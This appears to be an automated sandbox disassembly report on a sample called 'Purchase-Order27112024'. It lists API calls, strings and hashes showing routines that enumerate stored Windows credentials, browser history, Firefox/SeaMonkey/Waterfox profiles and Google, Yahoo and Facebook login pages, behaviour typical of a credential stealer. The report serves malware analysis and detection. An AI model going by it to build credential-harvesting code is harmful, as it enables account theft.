                                                                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                      • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                      • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                      • String ID: r!A$?a
                                                                                                      • API String ID: 2791114272-867810475
                                                                                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 115830560-3916222277
                                                                                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 841 41837f-4183bf 842 4183c1-4183cc call 418197 841->842 843 4183dc-4183ec call 418160 841->843 848 4183d2-4183d8 842->848 849 418517-41851d 842->849 850 4183f6-41840b 843->850 851 4183ee-4183f1 843->851 848->843 852 418417-418423 850->852 853 41840d-418415 850->853 851->849 854 418427-418442 call 41739b 852->854 853->854 857 418444-41845d CreateFileW 854->857 858 41845f-418475 CreateFileA 854->858 859 418477-41847c 857->859 858->859 860 4184c2-4184c7 859->860 861 41847e-418495 GetLastError free 859->861 864 4184d5-418501 memset call 418758 860->864 865 4184c9-4184d3 860->865 862 4184b5-4184c0 call 444706 861->862 863 418497-4184b3 call 41837f 861->863 862->849 863->849 869 418506-418515 free 864->869 865->864 869->849
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile$ErrorLastfree
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 77810686-1717621600
                                                                                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                      • String ID: $0.@$?a
                                                                                                      • API String ID: 2758756878-4046325517
                                                                                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID: C:\Windows\system32
                                                                                                      • API String ID: 669240632-2896066436
                                                                                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 697348961-0
                                                                                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                      • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                      • API String ID: 4039892925-11920434
                                                                                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
